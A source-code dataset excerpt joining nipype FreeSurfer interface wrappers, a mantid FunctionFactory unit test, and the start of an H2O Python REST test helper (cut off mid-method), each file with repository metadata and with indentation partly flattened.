identity = traits.Bool(argstr='--identity',
xor=('reg_file', 'reg_header', 'identity'),
desc='set R=I')
invert_mtx = traits.Bool(argstr='--invertmtx',
desc='Invert the registration matrix')
fill_thresh = traits.Range(0., 1., argstr='--fillthresh %.f',
desc='thresh : between 0 and 1')
label_voxel_volume = traits.Float(argstr='--labvoxvol %f',
desc='volume of each label point (def 1mm3)')
proj = traits.Tuple(traits.Enum('abs', 'frac'), traits.Float,
traits.Float, traits.Float,
argstr='--proj %s %f %f %f',
requires=('subject_id', 'hemi'),
desc='project along surface normal')
subject_id = traits.Str(argstr='--subject %s',
desc='subject id')
hemi = traits.Enum('lh', 'rh', argstr='--hemi %s',
desc='hemisphere to use lh or rh')
surface = traits.Str(argstr='--surf %s',
desc='use surface instead of white')
vol_label_file = File(argstr='--o %s', genfile=True,
desc='output volume')
label_hit_file = File(argstr='--hits %s',
desc='file with each frame is nhits for a label')
map_label_stat = File(argstr='--label-stat %s',
desc='map the label stats field into the vol')
native_vox2ras = traits.Bool(argstr='--native-vox2ras',
desc='use native vox2ras xform instead of tkregister-style')
class Label2VolOutputSpec(TraitedSpec):
vol_label_file = File(exists=True, desc='output volume')
class Label2Vol(FSCommand):
"""Make a binary volume from a Freesurfer label
Examples
--------
>>> binvol = Label2Vol(label_file='cortex.label', template_file='structural.nii', reg_file='register.dat', fill_thresh=0.5, vol_label_file='foo_out.nii')
>>> binvol.cmdline
'mri_label2vol --fillthresh 0 --label cortex.label --reg register.dat --temp structural.nii --o foo_out.nii'
"""
_cmd = 'mri_label2vol'
input_spec = Label2VolInputSpec
output_spec = Label2VolOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.vol_label_file
if not isdefined(outfile):
for key in ['label_file', 'annot_file', 'seg_file']:
if isdefined(getattr(self.inputs, key)):
path = getattr(self.inputs, key)
if isinstance(path, list):
path = path[0]
_, src = os.path.split(path)
if isdefined(self.inputs.aparc_aseg):
src = 'aparc+aseg.mgz'
outfile = fname_presuffix(src, suffix='_vol.nii.gz',
newpath=os.getcwd(),
use_ext=False)
outputs['vol_label_file'] = outfile
return outputs
def _gen_filename(self, name):
if name == 'vol_label_file':
return self._list_outputs()[name]
return None
class MS_LDAInputSpec(FSTraitedSpec):
lda_labels = traits.List(traits.Int(), argstr='-lda %s', mandatory=True,
minlen=2, maxlen=2, sep=' ',
desc='pair of class labels to optimize')
weight_file = traits.File(argstr='-weight %s', mandatory=True,
desc='filename for the LDA weights (input or output)')
vol_synth_file = traits.File(exists=False, argstr='-synth %s',
mandatory=True,
desc=('filename for the synthesized output '
'volume'))
label_file = traits.File(exists=True, argstr='-label %s',
desc='filename of the label volume')
mask_file = traits.File(exists=True, argstr='-mask %s',
desc='filename of the brain mask volume')
shift = traits.Int(argstr='-shift %d',
desc='shift all values equal to the given value to zero')
conform = traits.Bool(argstr='-conform',
desc=('Conform the input volumes (brain mask '
'typically already conformed)'))
use_weights = traits.Bool(argstr='-W',
desc=('Use the weights from a previously '
'generated weight file'))
images = InputMultiPath(File(exists=True), argstr='%s', mandatory=True,
copyfile=False, desc='list of input FLASH images',
position=-1)
class MS_LDAOutputSpec(TraitedSpec):
weight_file = File(exists=True, desc='')
vol_synth_file = File(exists=True, desc='')
class MS_LDA(FSCommand):
"""Perform LDA reduction on the intensity space of an arbitrary # of FLASH images
Examples
--------
>>> grey_label = 2
>>> white_label = 3
>>> zero_value = 1
>>> optimalWeights = MS_LDA(lda_labels=[grey_label, white_label], \
label_file='label.mgz', weight_file='weights.txt', \
shift=zero_value, vol_synth_file='synth_out.mgz', \
conform=True, use_weights=True, \
images=['FLASH1.mgz', 'FLASH2.mgz', 'FLASH3.mgz'])
>>> optimalWeights.cmdline
'mri_ms_LDA -conform -label label.mgz -lda 2 3 -shift 1 -W -synth synth_out.mgz -weight weights.txt FLASH1.mgz FLASH2.mgz FLASH3.mgz'
"""
_cmd = 'mri_ms_LDA'
input_spec = MS_LDAInputSpec
output_spec = MS_LDAOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.output_synth):
outputs['vol_synth_file'] = os.path.abspath(self.inputs.output_synth)
else:
outputs['vol_synth_file'] = os.path.abspath(self.inputs.vol_synth_file)
if not isdefined(self.inputs.use_weights) or self.inputs.use_weights is False:
outputs['weight_file'] = os.path.abspath(self.inputs.weight_file)
return outputs
def _verify_weights_file_exists(self):
if not os.path.exists(os.path.abspath(self.inputs.weight_file)):
raise traits.TraitError("MS_LDA: use_weights must accompany an existing weights file")
def _format_arg(self, name, spec, value):
        if name == 'use_weights':
if self.inputs.use_weights is True:
self._verify_weights_file_exists()
else:
return ''
# TODO: Fix bug when boolean values are set explicitly to false
return super(MS_LDA, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
pass
class Label2LabelInputSpec(FSTraitedSpec):
hemisphere = traits.String(argstr="--hemi %s", mandatory=True,
desc="Input hemisphere")
subject_id = traits.String(argstr="--trgsubject %s", mandatory=True,
desc="Target subject")
label = traits.String(mandatory=True, desc="Input label name")
sphere_reg = File(mandatory=True, exists=True,
desc="Implicit input <hemisphere>.sphere.reg")
white = File(mandatory=True, exists=True,
desc="Implicit input <hemisphere>.white")
# optional
source_subject = traits.String(argstr="--srcsubject %s", mandatory=False, genfile=True,
desc="Source subject")
source_label = File(argstr="--srclabel %s", mandatory=False, genfile=True, exists=True,
desc="Source label")
target_label = File(argstr="--trglabel %s", mandatory=False, genfile=True,
desc="Source label")
registration_method = traits.String(argstr="--regmethod %s", mandatory=False, genfile=True,
desc="Target subject")
threshold = traits.Bool(
mandatory=False, desc="Specifies whether source label should be the threshold label")
class Label2LabelOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Output label')
class Label2Label(FSCommand):
"""
Converts a label in one subject's space to a label
in another subject's space using either talairach or spherical
as an intermediate registration space.
If a source mask is used, then the input label must have been
created from a surface (ie, the vertex numbers are valid). The
format can be anything supported by mri_convert or curv or paint.
Vertices in the source label that do not meet threshold in the
mask will be removed from the label.
Examples
--------
>>> from nipype.interfaces.freesurfer import Label2Label
>>> l2l = Label2Label()
>>> l2l.inputs.hemisphere = 'lh'
>>> l2l.inputs.subject_id = '10335'
>>> l2l.inputs.label = 'fsaverage'
>>> l2l.inputs.sphere_reg = 'lh.pial'
>>> l2l.inputs.white = 'lh.pial'
>>> l2l.inputs.source_label = 'aseg.mgz'
>>> l2l.inputs.target_label = 'lh.aparc.label'
>>> l2l.cmdline
'mri_label2label --hemi lh --regmethod surface --srclabel aseg.mgz --srcsubject fsaverage --trgsubject 10335 --trglabel lh.aparc.label'
"""
_cmd = 'mri_label2label'
input_spec = Label2LabelInputSpec
output_spec = Label2LabelOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.target_label):
outputs['out_file'] = self.inputs.target_label
else:
out_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'label')
if self.inputs.threshold:
basename = self.inputs.hemisphere + '.' + \
self.inputs.label + '_exvivo.thresh.label'
else:
basename = self.inputs.hemisphere + '.' + self.inputs.label + '_exvivo.label'
outputs['out_file'] = os.path.join(out_dir, basename)
return outputs
def _gen_filename(self, name):
        # determine source subject
if not isdefined(self.inputs.source_subject):
# by default, the source subject is 'fsaverage'
src_subject = 'fsaverage'
else:
src_subject = self.inputs.source_subject
# if generating the source subject string
if name == 'source_subject':
return src_subject
# if generating the source label
elif name == 'source_label':
            # source label will be located in the source subject directory
fsaverage = os.path.join(self.inputs.subjects_dir, src_subject)
# if this directory doesn't exist, we need to create it
if not os.path.isdir(fsaverage):
fs_home = os.path.abspath(os.environ.get('FREESURFER_HOME'))
fsaverage_home = os.path.join(fs_home, 'subjects', 'fsaverage')
# Create a symlink
os.symlink(fsaverage_home, fsaverage)
# input label will be different depending on the whether it is a
# threshold or not
if self.inputs.threshold:
basename = self.inputs.hemisphere + '.' + \
self.inputs.label + '_exvivo.thresh.label'
else:
basename = self.inputs.hemisphere + '.' + self.inputs.label + '_exvivo.label'
return os.path.join(fsaverage, 'label', basename)
elif name == 'target_label':
return self._list_outputs()['out_file']
elif name == 'registration_method':
return 'surface'
else:
return None
class Label2AnnotInputSpec(FSTraitedSpec):
# required
hemisphere = traits.String(argstr="--hemi %s", mandatory=True,
desc="Input hemisphere")
subject_id = traits.String(argstr="--s %s", mandatory=True,
desc="Subject name/ID")
in_labels = traits.List(argstr="--l %s...", mandatory=True,
desc="List of input label files")
out_annot = traits.String(argstr="--a %s", mandatory=True,
desc="Name of the annotation to create")
# optional
keep_max = traits.Bool(argstr="--maxstatwinner", mandatory=False,
desc="Keep label with highest 'stat' value")
verbose_off = traits.Bool(argstr="--noverbose", mandatory=False,
desc="Turn off overlap and stat override messages")
color_table = File(argstr="--ctab %s", mandatory=False, exists=True,
desc="File that defines the structure names, their indices, and their color")
class Label2AnnotOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Output annotation file')
class Label2Annot(FSCommand):
"""
Converts a set of surface labels to an annotation file
Examples
--------
>>> from nipype.interfaces.freesurfer import Label2Annot
>>> l2a = Label2Annot()
>>> l2a.inputs.hemisphere = 'lh'
>>> l2a.inputs.subject_id = '10335'
>>> l2a.inputs.in_labels = ['lh.aparc.label']
>>> l2a.inputs.out_annot = 'test'
>>> l2a.cmdline
'mris_label2annot --hemi lh --l lh.aparc.label --a test --s 10335'
"""
_cmd = 'mris_label2annot'
input_spec = Label2AnnotInputSpec
output_spec = Label2AnnotOutputSpec
def _format_arg(self, name, spec, value):
if name == 'out_annot':
# this program will crash if the output annotation file already exists
# To prevent this, the file is deleted prior to running.
if os.path.isfile(self._list_outputs()['out_file']):
os.remove(self._list_outputs()['out_file'])
return super(Label2Annot, self)._format_arg(name, spec, value)
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.join(self.inputs.subjects_dir,
self.inputs.subject_id,
'label',
self.inputs.hemisphere + '.' + self.inputs.out_annot + '.annot')
return outputs
class SphericalAverageInputSpec(FSTraitedSpec):
out_file = File(argstr="%s", genfile=True, exists=False,
position=-1, desc="Output filename")
in_average = traits.Directory(argstr="%s", exists=True, genfile=True,
position=-2, desc="Average subject")
in_surf = File(argstr="%s", mandatory=True, exists=True,
position=-3, desc="Input surface file")
hemisphere = traits.Enum('lh', 'rh', argstr="%s", mandatory=True,
position=-4, desc="Input hemisphere")
fname = traits.String(argstr="%s", mandatory=True, position=-5,
desc="""Filename from the average subject directory.
Example: to use rh.entorhinal.label as the input label
filename, set fname to 'rh.entorhinal' and which to
'label'. The program will then search for
'{in_average}/label/rh.entorhinal.label'
""")
which = traits.Enum('coords', 'label', 'vals', 'curv', 'area',
argstr="%s", mandatory=True, position=-6, desc="No documentation")
subject_id = traits.String(
argstr="-o %s", mandatory=True, desc="Output subject id")
# optional
erode = traits.Int(argstr="-erode %d", desc="Undocumented")
in_orig = File(argstr="-orig %s", exists=True,
desc="Original surface filename")
threshold = traits.Float(argstr="-t %.1f", desc="Undocumented")
class SphericalAverageOutputSpec(TraitedSpec):
out_file = File(exists=False, desc='Output label')
class SphericalAverage(FSCommand):
"""
This program will add a template into an average surface.
Examples
--------
>>> from nipype.interfaces.freesurfer import SphericalAverage
>>> sphericalavg = SphericalAverage()
>>> sphericalavg.inputs.out_file = 'test.out'
>>> sphericalavg.inputs.in_average = '.'
>>> sphericalavg.inputs.in_surf = 'lh.pial'
>>> sphericalavg.inputs.hemisphere = 'lh'
>>> sphericalavg.inputs.fname = 'lh.entorhinal'
>>> sphericalavg.inputs.which = 'label'
>>> sphericalavg.inputs.subject_id = '10335'
>>> sphericalavg.inputs.erode = 2
>>> sphericalavg.inputs.threshold = 5
>>> sphericalavg.cmdline
'mris_spherical_average -erode 2 -o 10335 -t 5.0 label lh.entorhinal lh pial . test.out'
"""
_cmd = 'mris_spherical_average'
input_spec = SphericalAverageInputSpec
output_spec = SphericalAverageOutputSpec
def _format_arg(self, name, spec, value):
if name == 'in_orig' or name == 'in_surf':
surf = os.path.basename(value)
for item in ['lh.', 'rh.']:
surf = surf.replace(item, '')
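            # e.g. an in_surf of 'lh.pial' is passed to mris_spherical_average as
            # 'pial' (hemisphere prefix removed), matching the doctest above.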
return spec.argstr % surf
return super(SphericalAverage, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'in_average':
avg_subject = self.inputs.hemisphere + '.EC_average'
avg_directory = os.path.join(self.inputs.subjects_dir, avg_subject)
if not os.path.isdir(avg_directory):
fs_home = os.path.abspath(os.environ.get('FREESURFER_HOME'))
avg_home = os.path.join(fs_home, 'subjects', 'fsaverage')
return avg_subject
elif name == 'out_file':
return self._list_outputs()[name]
else:
return None
def _list_outputs(self):
outputs = self._outputs().get()
print outputs
if isdefined(self.inputs.out_file):
outputs['out_file'] = os.path.abspath(self.inputs.out_file)
else:
out_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'label')
if isdefined(self.inputs.in_average):
basename = os.path.basename(self.inputs.in_average)
basename = basename.replace('_', '_exvivo_') + '.label'
else:
basename = self.inputs.hemisphere + '.EC_exvivo_average.label'
outputs['out_file'] = os.path.join(out_dir, basename)
return outputs
|
dgellis90/nipype
|
nipype/interfaces/freesurfer/model.py
|
Python
|
bsd-3-clause
| 63,042
|
[
"Gaussian"
] |
4458a0019af6b1dd34ca8ee1c88c7745feae3ab5aeb1f716eccd4a772fbf9d22
|
from __future__ import (absolute_import, division, print_function)
import unittest
from mantid.api import IFunction1D, FunctionFactory
class TestFunction(IFunction1D):
def init(self):
pass
class FunctionFactoryTest(unittest.TestCase):
def test_get_function_factory_does_not_return_None(self):
self.assertTrue(FunctionFactory is not None)
def test_get_functions(self):
all_funcs = FunctionFactory.getFunctionNames()
self.assertTrue( len(all_funcs) > 0 )
self.assertTrue("Gaussian" in all_funcs)
def test_get_Gaussian(self):
name = "Gaussian"
func = FunctionFactory.createFunction(name)
self.assertTrue(func.name() == name)
self.assertTrue(len(func.__repr__()) > len(name))
self.assertTrue("Peak" in func.categories())
def test_function_subscription(self):
nfuncs_orig = len(FunctionFactory.getFunctionNames())
FunctionFactory.subscribe(TestFunction)
new_funcs = FunctionFactory.getFunctionNames()
self.assertEquals(nfuncs_orig+1, len(new_funcs))
self.assertTrue("TestFunction" in new_funcs)
FunctionFactory.unsubscribe("TestFunction")
new_funcs = FunctionFactory.getFunctionNames()
self.assertEquals(nfuncs_orig, len(new_funcs))
self.assertTrue("TestFunction" not in new_funcs)
if __name__ == '__main__':
unittest.main()
|
wdzhou/mantid
|
Framework/PythonInterface/test/python/mantid/api/FunctionFactoryTest.py
|
Python
|
gpl-3.0
| 1,409
|
[
"Gaussian"
] |
801ee71bd425e9068587a16d43cd7e1f228870d2931c49303364dd032cd6a28b
|
import sys, os, getpass, logging, time, inspect, requests, json, pprint
import h2o_test_utils
from h2o_test_utils import log, log_rest
import h2o_print as h2p
class H2O(object):
# static (class) variables
ipaddr_from_cmd_line = None
debugger = False
json_url_history = []
python_test_name = inspect.stack()[1][1]
verbose = False
experimental_algos = ["svd"]
## TODO: support api_version parameter for all api calls!
# Also a global in the H2O object set at creation time.
# TODO: ensure that all of this is really necessary:
def __init__(self,
use_this_ip_addr=None, port=54321, capture_output=True,
use_debugger=None, classpath=None,
use_hdfs=False, use_maprfs=False,
# hdfs_version="cdh4", hdfs_name_node="192.168.1.151",
# hdfs_version="cdh3", hdfs_name_node="192.168.1.176",
hdfs_version=None, hdfs_name_node=None, hdfs_config=None,
aws_credentials=None,
use_flatfile=False, java_heap_GB=None, java_heap_MB=None, java_extra_args=None,
use_home_for_ice=False, node_id=None, username=None,
random_udp_drop=False,
redirect_import_folder_to_s3_path=None,
redirect_import_folder_to_s3n_path=None,
disable_h2o_log=False,
enable_benchmark_log=False,
h2o_remote_buckets_root=None,
delete_keys_at_teardown=False,
cloud_name=None,
):
if use_hdfs:
# see if we can touch a 0xdata machine
try:
# long timeout in ec2...bad
a = requests.get('http://192.168.1.176:80', timeout=1)
hdfs_0xdata_visible = True
except:
hdfs_0xdata_visible = False
# different defaults, depending on where we're running
if hdfs_name_node is None:
if hdfs_0xdata_visible:
hdfs_name_node = "192.168.1.176"
else: # ec2
hdfs_name_node = "10.78.14.235:9000"
if hdfs_version is None:
if hdfs_0xdata_visible:
hdfs_version = "cdh3"
else: # ec2
hdfs_version = "0.20.2"
self.redirect_import_folder_to_s3_path = redirect_import_folder_to_s3_path
self.redirect_import_folder_to_s3n_path = redirect_import_folder_to_s3n_path
self.aws_credentials = aws_credentials
self.port = port
# None is legal for self.addr.
# means we won't give an ip to the jar when we start.
# Or we can say use use_this_ip_addr=127.0.0.1, or the known address
# if use_this_addr is None, use 127.0.0.1 for urls and json
# Command line arg 'ipaddr_from_cmd_line' dominates:
if H2O.ipaddr_from_cmd_line:
self.addr = H2O.ipaddr_from_cmd_line
else:
self.addr = use_this_ip_addr
if self.addr is not None:
self.http_addr = self.addr
else:
self.http_addr = get_ip_address()
# command line should always dominate for enabling
if H2O.debugger: use_debugger = True
self.use_debugger = use_debugger
self.classpath = classpath
self.capture_output = capture_output
self.use_hdfs = use_hdfs
self.use_maprfs = use_maprfs
self.hdfs_name_node = hdfs_name_node
self.hdfs_version = hdfs_version
self.hdfs_config = hdfs_config
self.use_flatfile = use_flatfile
self.java_heap_GB = java_heap_GB
self.java_heap_MB = java_heap_MB
self.java_extra_args = java_extra_args
self.use_home_for_ice = use_home_for_ice
self.node_id = node_id
if username:
self.username = username
else:
self.username = getpass.getuser()
# don't want multiple reports from tearDown and tearDownClass
# have nodes[0] remember (0 always exists)
self.sandbox_error_was_reported = False
self.sandbox_ignore_errors = False
self.random_udp_drop = random_udp_drop
self.disable_h2o_log = disable_h2o_log
# this dumps stats from tests, and perf stats while polling to benchmark.log
self.enable_benchmark_log = enable_benchmark_log
self.h2o_remote_buckets_root = h2o_remote_buckets_root
self.delete_keys_at_teardown = delete_keys_at_teardown
if cloud_name:
self.cloud_name = cloud_name
else:
self.cloud_name = 'pytest-%s-%s' % (getpass.getuser(), os.getpid())
'''
Printable string representation of an H2O node object.
'''
def __str__(self):
return '%s - http://%s:%d/' % (type(self), self.http_addr, self.port)
# TODO: UGH, move this.
@staticmethod
def verboseprint(*args, **kwargs):
if H2O.verbose:
for x in args: # so you don't have to create a single string
print(x),
for x in kwargs: # so you don't have to create a single string
print(x),
print
sys.stdout.flush()
def __url(self, loc, port=None):
# always use the new api port
if port is None: port = self.port
if loc.startswith('/'):
delim = ''
else:
delim = '/'
u = 'http://%s:%d%s%s' % (self.http_addr, port, delim, loc)
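        # Illustrative result (assuming the default address and port):
        # __url('Cloud.json') -> 'http://127.0.0.1:54321/Cloud.json'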
return u
'''
    Make a REST request to the h2o server and if successful return a dict containing the JSON result.
'''
# @profile
def __do_json_request(self, jsonRequest=None, fullUrl=None, timeout=10, params=None, postData=None, returnFast=False,
cmd='get', extraComment=None, ignoreH2oError=False, noExtraErrorCheck=False, raiseIfNon200=True, suppressErrorMsg=False, **kwargs):
H2O.verboseprint("__do_json_request, timeout: " + str(timeout))
        # if url param is used, use it as full url. otherwise create it from the jsonRequest
if fullUrl:
url = fullUrl
else:
url = self.__url(jsonRequest)
# remove any params that are 'None'
# need to copy dictionary, since can't delete while iterating
if params is not None:
params_serialized = params.copy()
for k in params_serialized:
if params_serialized[k] is None:
del params[k]
paramsStr = '?' + '&'.join(['%s=%s' % (k, v) for (k, v) in params.items()])
else:
paramsStr = ''
# The requests package takes array parameters and explodes them: ['f00', 'b4r'] becomes "f00,b4r".
# NOTE: this handles 1D arrays only; if we need ND this needs to be recursive.
# NOTE: we currently don't need to do this for GET, so that's not implemented.
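        # Illustrative example of the munging below (hypothetical field names):
        #   postData = {'ignored_columns': ['C1', 'C2'], 'k': 3}
        #   becomes    {'ignored_columns': '["C1", "C2"]', 'k': 3}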
if postData is not None:
munged_postData = {}
for k, v in postData.iteritems():
if type(v) is list:
if len(v) == 0:
munged_postData[k] = '[]'
else:
first = True
array_str = '['
for val in v:
if not first: array_str += ', '
if val is None:
array_str += 'null'
elif isinstance(val, basestring):
array_str += "\"" + str(val) + "\""
else:
array_str += str(val)
first = False
array_str += ']'
munged_postData[k] = array_str
elif type(v) is dict:
if len(v) == 0:
munged_postData[k] = '{}'
else:
first = True
map_str = '{'
for key, val in v.iteritems():
if not first: map_str += ', '
if val is None:
map_str += "\"" + key + "\"" + ': null'
elif isinstance(val, basestring):
map_str += "\"" + str(key) + "\"" + ":" + "\"" + str(val) + "\""
else:
map_str += "\"" + key + "\"" + ':' + str(val)
first = False
map_str += '}'
munged_postData[k] = map_str
else:
# not list:
munged_postData[k] = v
else:
# None
munged_postData = postData
# print("munged_postData: " + repr(munged_postData))
if extraComment:
log('Start ' + url + paramsStr, comment=extraComment)
else:
log('Start ' + url + paramsStr)
log_rest("")
log_rest("----------------------------------------------------------------------\n")
if extraComment:
log_rest("# Extra comment info about this request: " + extraComment)
if cmd == 'get':
log_rest("GET")
else:
log_rest("POST")
log_rest(url + paramsStr)
# file get passed thru kwargs here
try:
if 'post' == cmd:
                # NOTE: for now, since we don't have deserialization from JSON in h2o-dev, we use form-encoded POST.
# This is temporary.
#
# This following does application/json (aka, posting JSON in the body):
# r = requests.post(url, timeout=timeout, params=params, data=json.dumps(munged_postData), **kwargs)
#
# This does form-encoded, which doesn't allow POST of nested structures
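                # Illustrative difference (hypothetical payload): form encoding sends a
                # body like 'key=value&n=1', whereas the json.dumps variant above would
                # send '{"key": "value", "n": 1}' as the request body.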
r = requests.post(url, timeout=timeout, params=params, data=munged_postData, **kwargs)
elif 'delete' == cmd:
r = requests.delete(url, timeout=timeout, params=params, **kwargs)
elif 'get' == cmd:
r = requests.get(url, timeout=timeout, params=params, **kwargs)
else:
raise ValueError("Unknown HTTP command (expected 'get', 'post' or 'delete'): " + cmd)
except Exception as e:
# rethrow the exception after we've checked for stack trace from h2o
# out of memory errors maybe don't show up right away? so we should wait for h2o
# to get it out to h2o stdout. We don't want to rely on cloud teardown to check
# because there's no delay, and we don't want to delay all cloud teardowns by waiting.
# (this is new/experimental)
exc_info = sys.exc_info()
# use this to ignore the initial connection errors during build cloud when h2o is coming up
if not noExtraErrorCheck:
h2p.red_print(
"ERROR: got exception on %s to h2o. \nGoing to check sandbox, then rethrow.." % (url + paramsStr))
time.sleep(2)
H2O.check_sandbox_for_errors(python_test_name=H2O.python_test_name);
log_rest("")
log_rest("EXCEPTION CAUGHT DOING REQUEST: " + str(e.message))
            raise exc_info[1], None, exc_info[2]
H2O.verboseprint("r: " + repr(r))
if 200 != r.status_code:
pp = pprint.PrettyPrinter(indent=4)
msg = "JSON call returned non-200 status: " + url
json = r.json()
if None != json and 'dev_msg' in json:
msg += "\ndev_msg: "
msg += str(json['dev_msg'])
msg += "\nr.status_code: " + str(r.status_code)
msg += "\nr.headers: " + repr(r.headers)
if None == json:
msg += '\nERROR: the error output from H2O is not JSON!'
msg += "\nr.text: " + r.text
else:
msg += "\nr.json: "
msg += pp.pformat(json)
if raiseIfNon200:
pass # we'll pass msg up with the exception
elif not suppressErrorMsg:
print(msg)
log_rest(msg)
log_rest("")
try:
if r is None:
log_rest("r is None")
else:
log_rest("HTTP status code: " + str(r.status_code))
# The following accesses to r.text were taking most of the runtime:
log_text = False
if log_text:
if hasattr(r, 'text'):
if r.text is None:
log_rest("r.text is None")
else:
log_rest(r.text)
else:
log_rest("r does not have attr text")
except Exception as e:
# Paranoid exception catch.
# Ignore logging exceptions in the case that the above error checking isn't sufficient.
print("Caught exception from result logging: ", e, "; result: ", repr(r))
# fatal if no response
if raiseIfNon200 and not r:
raise Exception("Maybe bad url? no r in __do_json_request in %s:" % inspect.stack()[1][3] + "\n\n" + msg)
# this is used to open a browser on results, or to redo the operation in the browser
# we don't have that many urls flying around, so let's keep them all
H2O.json_url_history.append(r.url)
# if r.json():
# raise Exception("Maybe bad url? no r.json in __do_json_request in %s:" % inspect.stack()[1][3])
rjson = None
if returnFast:
return
try:
rjson = r.json()
except:
print(h2o_test_utils.dump_json(r.text))
# r is the requests Response object, not the decoded payload; if r.json() failed then
# the body wasn't valid JSON (h2o json responses should always be lists or dicts)
raise Exception("Could not decode any json from the request; see previous output for the response text.")
# TODO
# TODO
# TODO
# TODO: we should really only look in the response object. This check
# prevents us from having a field called "error" (e.g., for a scoring result).
for e in ['error', 'Error', 'errors', 'Errors']:
# error can be null (python None). This happens in exec2
if e in rjson and rjson[e]:
H2O.verboseprint("rjson:" + h2o_test_utils.dump_json(rjson))
emsg = 'rjson %s in %s: %s' % (e, inspect.stack()[1][3], rjson[e])
if ignoreH2oError:
# well, we print it..so not totally ignore. test can look at rjson returned
print(emsg)
else:
print(emsg)
raise Exception(emsg)
for w in ['warning', 'Warning', 'warnings', 'Warnings']:
# warning can be null (python None).
if w in rjson and rjson[w]:
H2O.verboseprint(dump_json(rjson))
print('rjson %s in %s: %s' % (w, inspect.stack()[1][3], rjson[w]))
# Allow the caller to check things like __http_request.status_code.
# The response object is not JSON-serializable, so we capture the fields we want here:
response = {}
# response['headers'] = r.headers
response['url'] = r.url
response['status_code'] = r.status_code
response['text'] = r.text
rjson['__http_response'] = response
return rjson
# end of __do_json_request
'''
Check the output for errors. Note: false positives are possible; a whitelist is available.
'''
@staticmethod
def check_sandbox_for_errors(cloudShutdownIsError=False, sandboxIgnoreErrors=False, python_test_name=''):
# TODO: nothing right now
return
# don't have both tearDown and tearDownClass report the same found error
# only need the first
if nodes and nodes[0].sandbox_error_report(): # gets current state
return
# Can build a cloud that ignores all sandbox things that would normally be fatal to the test.
# Kludge: the test will set this directly if it wants, rather than thru a build_cloud parameter.
# We need sandbox_ignore_errors for the test teardown_cloud... the state disappears!
ignore = sandboxIgnoreErrors or (nodes and nodes[0].sandbox_ignore_errors)
errorFound = h2o_sandbox.check_sandbox_for_errors(
LOG_DIR=LOG_DIR,
sandboxIgnoreErrors=ignore,
cloudShutdownIsError=cloudShutdownIsError,
python_test_name=python_test_name)
if errorFound and nodes:
nodes[0].sandbox_error_report(True) # sets
###################
# REST API ACCESSORS
'''
Fetch all the cluster status from the /Cloud endpoint.
'''
def cloud(self, timeoutSecs=10, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'cloud', H2O.verbose)
result = self.__do_json_request('/3/Cloud', timeout=timeoutSecs, params=params_dict)
return result
'''
Determine if the cluster status is not good. Returns a message (which evaluates as True)
if cloud status is bad; else returns None (which evaluates as False).
'''
def cloud_is_bad(self, timeoutSecs=10, **kwargs):
try:
cloud = self.cloud()
except Exception as e:
return str(e)
if cloud is None:
return '/3/Cloud returned None'
if 'cloud_size' not in cloud:
return '/3/Cloud return value does not contain cloud_size'
if 'nodes' not in cloud:
return '/3/Cloud return value does not contain nodes'
if type(cloud['nodes']) is not list:
return '/3/Cloud nodes element is not a list'
if cloud['cloud_size'] < 1:
return 'cloud_size < 1: ' + str(cloud['cloud_size'])
if cloud['cloud_size'] != len(cloud['nodes']):
return '/3/Cloud nodes list length != cloud_size'
node_num = 0
for node in cloud['nodes']:
if 'healthy' not in node:
return '/3/Cloud node return value does not contain healthy'
if not node['healthy']:
return 'node ' + str(node_num) + ' is not healthy'
return None
'''
Fetch all the jobs or a single job from the /Jobs endpoint.
'''
def jobs(self, job_key=None, timeoutSecs=10, **kwargs):
params_dict = {
'job_key': job_key
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'jobs', H2O.verbose)
result = self.__do_json_request('/3/Jobs', timeout=timeoutSecs, params=params_dict)
return result
'''
Poll a single job from the /Jobs endpoint until it is "status": "DONE" or "CANCELLED" or "FAILED" or we time out.
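Illustrative usage (a hedged sketch; job_key is whatever a previous asynchronous call returned):
    job_json = node.poll_job(job_key, timeoutSecs=60, retryDelaySecs=0.5)
    if job_json is not None:
        status = job_json['jobs'][0]['status']  # 'DONE', 'CANCELLED' or 'FAILED'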
'''
# TODO: add delays, etc.
def poll_job(self, job_key, timeoutSecs=10, retryDelaySecs=0.5, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'poll_job', H2O.verbose)
start_time = time.time()
while True:
H2O.verboseprint('Polling for job: ' + job_key + '. . .')
result = self.__do_json_request('/3/Jobs/' + job_key, timeout=timeoutSecs, params=params_dict)
status = result['jobs'][0]['status']
if status == 'DONE' or status == 'CANCELLED' or status == 'FAILED':
H2O.verboseprint('Job ' + status + ': ' + job_key + '.')
return result
if time.time() - start_time > timeoutSecs:
print('Job: ' + job_key + ' timed out in: ' + str(timeoutSecs) + '.')
# downstream checkers should tolerate None. Print msg in case it's overlooked.
return None
time.sleep(retryDelaySecs)
'''
Create a Frame.
'''
def create_frame(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('3/CreateFrame', cmd="post",
timeout=timeoutSecs,
params=kwargs
)
H2O.verboseprint("\ncreate_frame result:", h2o_test_utils.dump_json(a))
return a
'''
Split a Frame.
'''
def split_frame(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('/3/SplitFrame', cmd="post",
timeout=timeoutSecs,
postData=kwargs
)
job_json = self.poll_job(a["key"]["name"], timeoutSecs=timeoutSecs)
H2O.verboseprint("\nsplit_frame result:", h2o_test_utils.dump_json(a))
return a
'''
Create interactions.
'''
def interaction(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('/3/Interaction', cmd="post",
timeout=timeoutSecs,
postData=kwargs
)
H2O.verboseprint("\ninteraction result:", h2o_test_utils.dump_json(a))
return a
'''
Import a file or files into h2o. The 'file' parameter accepts a directory or a single file.
192.168.0.37:54323/ImportFiles.html?file=%2Fhome%2F0xdiag%2Fdatasets
'''
def import_files(self, path, timeoutSecs=180):
a = self.__do_json_request('/3/ImportFiles',
